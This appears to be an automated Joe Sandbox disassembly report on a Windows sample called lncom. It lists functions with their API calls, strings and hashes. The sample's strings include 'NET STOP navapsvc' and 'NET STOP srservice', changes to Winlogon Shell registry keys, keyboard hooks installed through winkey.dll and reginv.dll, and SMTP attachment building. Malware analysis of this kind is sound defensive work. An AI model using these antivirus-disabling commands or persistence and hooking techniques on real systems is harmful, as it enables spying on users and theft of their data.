Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CloseFileName$AttributesDirectoryEnumExecFindFlushModuleOpenPathShortVersionWindowWindows
String ID: ,$Explorer.exe$SOFTWARE\Microsoft DirectX$SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\$Shell$Windows services
API String ID: 1721353502-4087913929
Opcode ID: 3fe53cf2772122a4924eadad547db08d81134102a8f37be17399d60cdd44ef2e
Instruction ID: e61f0a7f2f6f86ea2394739b93ee4eda4bfb7c16e5f0064bd4fe9a462728a8e0
Opcode Fuzzy Hash: 3fe53cf2772122a4924eadad547db08d81134102a8f37be17399d60cdd44ef2e
Instruction Fuzzy Hash: 3F810734A1022DCADB50AB91C845BDDF3B9FF86308F5080EBD44C66262D7795E89CF56

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1F4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040D216
SetCurrentDirectoryA.KERNEL32(?), ref: 0040D302
LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 0040D354
GetProcAddress.KERNEL32(InstallHook,00000000), ref: 0040D3A2

Strings

InstallHook, xrefs: 0040D397
\reginv.dll, xrefs: 0040D31F
,, xrefs: 0040D3AA
\reginv.dll, xrefs: 0040D232

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Directory$AddressCurrentLibraryLoadProcSystem
String ID: ,$InstallHook$\reginv.dll$\reginv.dll
API String ID: 3289889838-443075085
Opcode ID: a1ec89330cea7170e5aa7357cfbdb5eb5146b6ae8a4074aa0ab8a205d12bbf96
Instruction ID: 1d5c79546029832f90678ebe59e0702bda9e034660824344f84a21748b42bb32
Opcode Fuzzy Hash: a1ec89330cea7170e5aa7357cfbdb5eb5146b6ae8a4074aa0ab8a205d12bbf96
Instruction Fuzzy Hash: F2512D34D0011D8BCF10EBE5D846ADDB7B8FF9A309F10806BE80476252D7789A4ACB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040CFFC Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040D01E
SetCurrentDirectoryA.KERNEL32(?), ref: 0040D10A
LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 0040D15C
GetProcAddress.KERNEL32(installhook,00000000), ref: 0040D1AA

Strings

,, xrefs: 0040D1B2
installhook, xrefs: 0040D19F
\winkey.dll, xrefs: 0040D127
\winkey.dll, xrefs: 0040D03A

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Directory$AddressCurrentLibraryLoadProcSystem
String ID: ,$\winkey.dll$\winkey.dll$installhook
API String ID: 3289889838-3961663902
Opcode ID: cfda090237923bec656900a841edb94df392667aeaf5f15202eed10764f428fa
Instruction ID: 856e23b7d908c51261825727391bed2c00561cd4ec1ebb9a195af12a811339b9
Opcode Fuzzy Hash: cfda090237923bec656900a841edb94df392667aeaf5f15202eed10764f428fa
Instruction Fuzzy Hash: C7514C34D0011DCBCF10EBE5D846ADEB7B9FF89309F10806BE40576252DB799A4ACB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040E7D0 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 111processCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(00000094), ref: 0040E7F7

Part of subcall function 004512FC: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00451401), ref: 00451376

Part of subcall function 00451188: RegCloseKey.ADVAPI32(00010000,00451064,004511DF,00451064,00000001,00451136,?,?,004015B8), ref: 00451199

Part of subcall function 004512FC: RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00451401), ref: 004513AA

Part of subcall function 00451188: RegFlushKey.ADVAPI32(00010000,00451064,004511DF,00451064,00000001,00451136,?,?,004015B8), ref: 004511A1

WinExec.KERNEL32(NET STOP navapsvc,00000000), ref: 0040E931

Strings

SYSTEM\ControlSet001\Services\navapsvc, xrefs: 0040E83F
Start, xrefs: 0040E8E0
P, xrefs: 0040E963
SYSTEM\CurrentControlSet\Services\navapsvc, xrefs: 0040E8AE
NET STOP navapsvc, xrefs: 0040E92C
Start, xrefs: 0040E871

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CloseCreateExecFlushOpenVersion
String ID: NET STOP navapsvc$P$SYSTEM\ControlSet001\Services\navapsvc$SYSTEM\CurrentControlSet\Services\navapsvc$Start$Start
API String ID: 377872373-871924737
Opcode ID: c57eb379267eb6ec56c9d92069d82d7742859f7ee7c1dff0439f73aac799a8f6
Instruction ID: 9eebb002d3f98cb5f52a1137992eccb9b73ff6fdf0b57c26fba4300d016a13e0
Opcode Fuzzy Hash: c57eb379267eb6ec56c9d92069d82d7742859f7ee7c1dff0439f73aac799a8f6
Instruction Fuzzy Hash: AD41C834910119CBCB10EBA5C846BDEB7B5FF89308F10806AD90577262D7795D4ACBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00410570 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 94processCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(00000094), ref: 0041059D

Part of subcall function 004512FC: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00451401), ref: 00451376

Part of subcall function 00451188: RegCloseKey.ADVAPI32(00010000,00451064,004511DF,00451064,00000001,00451136,?,?,004015B8), ref: 00451199

Part of subcall function 004512FC: RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00451401), ref: 004513AA

Part of subcall function 00451188: RegFlushKey.ADVAPI32(00010000,00451064,004511DF,00451064,00000001,00451136,?,?,004015B8), ref: 004511A1

WinExec.KERNEL32(NET STOP srservice,00000000), ref: 004106BE

Strings

SYSTEM\CurrentControlSet\Services\srservice, xrefs: 0041064E
Start, xrefs: 00410611
NET STOP srservice, xrefs: 004106B9
SYSTEM\ControlSet001\Services\srservice, xrefs: 004105DF
Start, xrefs: 00410680
8, xrefs: 0041067A

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CloseCreateExecFlushOpenVersion
String ID: 8$NET STOP srservice$SYSTEM\ControlSet001\Services\srservice$SYSTEM\CurrentControlSet\Services\srservice$Start$Start
API String ID: 377872373-1480231252
Opcode ID: a6846d1c505e2367bef06d508397136119a4611b5c197d637b18ccdec9864981
Instruction ID: 6c975e502b4db5faa5c8e112d5428f86ad8b68f4606302ae4971f836f0f6ada9
Opcode Fuzzy Hash: a6846d1c505e2367bef06d508397136119a4611b5c197d637b18ccdec9864981
Instruction Fuzzy Hash: 1F31103491010D9BDB00EBD1D542BDEB7B5FF89308F6040AEE5047B262D7B99D4A8B99

Uniqueness

Uniqueness Score: -1.00%

Function 00437250 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

@Wsocket@TCustomWSocket@Connect$qqrv.LNCOM ref: 00437281

Strings

tcp, xrefs: 0043729F
tcp is the only protocol supported thru socks server, xrefs: 004372AB

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Connect$qqrvCustomSocket@Wsocket@
String ID: tcp$tcp is the only protocol supported thru socks server
API String ID: 2088347470-3559747665
Opcode ID: 78b3d7677bf9cd4eaaafc20055d0650fcc64fee920bf302260130bf2272e2c99
Instruction ID: 921fce8d26bfc070de6e1a5214269689ca6571b7203fe99d3247e74ccd13a910
Opcode Fuzzy Hash: 78b3d7677bf9cd4eaaafc20055d0650fcc64fee920bf302260130bf2272e2c99
Instruction Fuzzy Hash: 7B412CB4A04544EFDB14CF99C985AAEB7F1EF49304F2550F6E84497352D778AE00EB18

Uniqueness

Uniqueness Score: -1.00%

Function 00496048 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 76libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(borlndmm,?,?,0049622C), ref: 00496054
GetProcAddress.KERNEL32(00000000,@Borlndmm@HeapAddRef$qqrv), ref: 00496092
GetProcAddress.KERNEL32(00000000,@Borlndmm@HeapRelease$qqrv), ref: 004960A8

Strings

@Borlndmm@HeapRelease$qqrv, xrefs: 0049609C
@Borlndmm@HeapAddRef$qqrv, xrefs: 00496086
borlndmm, xrefs: 0049604F
hrdir_b.c: GetMem or FreeMem or ReallocMem from borlndmm failed, xrefs: 0049610A
hrdir_b.c: FATAL!!! memory has been allocated prior to heap redirector hook!, xrefs: 00496121

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: @Borlndmm@HeapAddRef$qqrv$@Borlndmm@HeapRelease$qqrv$borlndmm$hrdir_b.c: FATAL!!! memory has been allocated prior to heap redirector hook!$hrdir_b.c: GetMem or FreeMem or ReallocMem from borlndmm failed
API String ID: 667068680-342777435
Opcode ID: f6e076ed7d9c2d4a3247ae5e2867ae2ce7a1100f75d8656d08b21001e3321cf9
Instruction ID: f706759b670e827b863e41dbf8ac2a709e07d4db889e235ccf8bf6ddb9ec5c82
Opcode Fuzzy Hash: f6e076ed7d9c2d4a3247ae5e2867ae2ce7a1100f75d8656d08b21001e3321cf9
Instruction Fuzzy Hash: 51214DB0501710DBEB30EFA9E89A7573FA5B720719F12853FE005472A2D7B8948CDB59

Uniqueness

Uniqueness Score: -1.00%

Function 0047620C Relevance: 13.6, APIs: 9, Instructions: 118windowCOMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00476249
GetDCEx.USER32(?,00000000,00000402), ref: 0047625C
SelectObject.GDI32(?,00000000), ref: 0047627F
PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 004762A5
PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 004762C7
PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 004762E6
PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 00476300
SelectObject.GDI32(?,?), ref: 0047630D
ReleaseDC.USER32(?,?), ref: 00476327

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: ObjectSelect$DesktopReleaseWindow
String ID:
API String ID: 1187665388-0
Opcode ID: 2f127b8f3e1d012a817ca093b60ee7354bdd14202a985df8cb80d3090e1a79df
Instruction ID: b5b2a0d6025ef3b7b0c3351a37277fbdffc6e9a202bfe5e91db9b1a67e341fc4
Opcode Fuzzy Hash: 2f127b8f3e1d012a817ca093b60ee7354bdd14202a985df8cb80d3090e1a79df
Instruction Fuzzy Hash: 1D31FEB5A00219AFDB40DAEDCC85EEFBBBDFB49704B414469B604E3245C678AD04CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040275C Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 458COMMON

Download Yara Rule

Strings

%s., xrefs: 00402BB3
|[\, xrefs: 00402765
%c%s, xrefs: 00402A0B

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID:
String ID: %c%s$%s.$|[\
API String ID: 0-150735290
Opcode ID: be4213fd41c56ecbf3c33967bce8f769f91eff2ef92a21b33f62c18a51554381
Instruction ID: 84f795d524f36e0f4b69b1d80e913dcb145923461daa4ad3afc48ffe677da6fd
Opcode Fuzzy Hash: be4213fd41c56ecbf3c33967bce8f769f91eff2ef92a21b33f62c18a51554381
Instruction Fuzzy Hash: C8129A71D002589FCB14DBA9D884BEDBBB4BF48304F24C1AAE849B72C1DB799A45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00444A30 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 244COMMON

Download Yara Rule

APIs

@Smtpprot@TCustomSmtpClient@TriggerGetData$qqripciro.LNCOM(?,?), ref: 00444AD3

Strings

Content-Type: , xrefs: 00444BC0
name=", xrefs: 00444BEB
filename=", xrefs: 00444C3C
application/octet-stream, xrefs: 00444B74
Content-Disposition: attachment;, xrefs: 00444C29
Content-Transfer-Encoding: base64, xrefs: 00444C16

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Client@CustomData$qqripciroSmtpSmtpprot@Trigger
String ID: filename="$name="$Content-Disposition: attachment;$Content-Transfer-Encoding: base64$Content-Type: $application/octet-stream
API String ID: 379017484-3300206508
Opcode ID: 5ad7fe96bc72de4a78a19a4f885f224489a353900101c6571f9d5e8c8efd3808
Instruction ID: da1bebebf50f0984446be8b901770b0ec9993b3be5b7e7ec09347131e425c065
Opcode Fuzzy Hash: 5ad7fe96bc72de4a78a19a4f885f224489a353900101c6571f9d5e8c8efd3808
Instruction Fuzzy Hash: 34C1A238A00208EFDB04DBA4C584ADDBBF1FF89300F6541A5E905AB366CB34AE46CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0048F250 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,0048F51B,?,00000000,00000000,00000000,?,0046D78A,00000400,?,?,0046D8B3,00000000,0046DE94), ref: 0048F286

Part of subcall function 0048DCF8: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,00000044,?,?,0048DD8D,?,005DABC4,005DAB94,00000001,005D541C,?,0048DDF3,?), ref: 0048DD16

Strings

m/d/yy, xrefs: 0048F355
e/E, xrefs: 0048F4B9
AMPM, xrefs: 0048F49A
mmmm d, yyyy, xrefs: 0048F382
AMPM , xrefs: 0048F4A9
:mm:ss, xrefs: 0048F4D6

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm:ss$AMPM $e/E$m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2459218326
Opcode ID: 0809c7a1a0c3f19a09552f6bf9f10155d60a7cf79b2b9f7c7f5a8f9e0d4c73ae
Instruction ID: f23d765e773f91fe64893ab3e609d60b28340617753ff494c0970e3872c31f72
Opcode Fuzzy Hash: 0809c7a1a0c3f19a09552f6bf9f10155d60a7cf79b2b9f7c7f5a8f9e0d4c73ae
Instruction Fuzzy Hash: C9618F70B012485BDB00FBE9D841A9F77A69F89304F50883BF501AB742DA7CDE0A8759

Uniqueness

Uniqueness Score: -1.00%

Function 0044AD04 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179networkCOMMON

Download Yara Rule

APIs

WSAAsyncGetServByName.WS2_32(00000000,00000403,00000000,tcp,00000000,00000400), ref: 0044AE7C

Strings

tcp, xrefs: 0044AE60
WSAASyncGetHostByName, xrefs: 0044ADB0
WSAASyncGetServByName, xrefs: 0044AE91

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: AsyncNameServ
String ID: WSAASyncGetHostByName$WSAASyncGetServByName$tcp
API String ID: 3568414129-1163084229
Opcode ID: cbe121f3bb95b8bfbb7eae48afcb69b4796f0586f008d9d26a15ed92a6654d3a
Instruction ID: 98e3de92c4376bfa89faf5ae4cdc76f1f76093dc5962834cd6c7953baa5280be
Opcode Fuzzy Hash: cbe121f3bb95b8bfbb7eae48afcb69b4796f0586f008d9d26a15ed92a6654d3a
Instruction Fuzzy Hash: DD61AEB0A84244EFEB00DF99D641A9EB7F5EF48304F25409AF9049B352D738EE11DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C840 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 134stringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040C879
lstrcat.KERNEL32(?,00000000), ref: 0040C941
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 0040C994

Strings

y20160, xrefs: 0040CA06
open, xrefs: 0040C98D
y10160, xrefs: 0040C99F
\, xrefs: 0040CA00

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: DirectoryExecuteShellSystemlstrcat
String ID: \$open$y10160$y20160
API String ID: 199291019-4169512619
Opcode ID: 5ae6023f0e8c2b73552b97afa5f718db0605ff4470b10bfea696a36acb153659
Instruction ID: 658e73545142b2616bf4fbc0d153cf3cd71f5cac75796d45b648e541a71c3e68
Opcode Fuzzy Hash: 5ae6023f0e8c2b73552b97afa5f718db0605ff4470b10bfea696a36acb153659
Instruction Fuzzy Hash: 63514434A0011D9BDB00EFE5D946BEDB3B9FF89308F10807BE505B7262D7B859099B69

Uniqueness

Uniqueness Score: -1.00%

Function 0046E6F8 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 128windowCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 0046E70B
GetWindowRect.USER32(?,?), ref: 0046E765
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 0046E79D
MessageBoxA.USER32(?,?,?,?), ref: 0046E7D6
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0046E844,?,00000000,0046E83D), ref: 0046E826
SetActiveWindow.USER32(?,0046E844,?,00000000,0046E83D), ref: 0046E837

Strings

(, xrefs: 0046E742

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
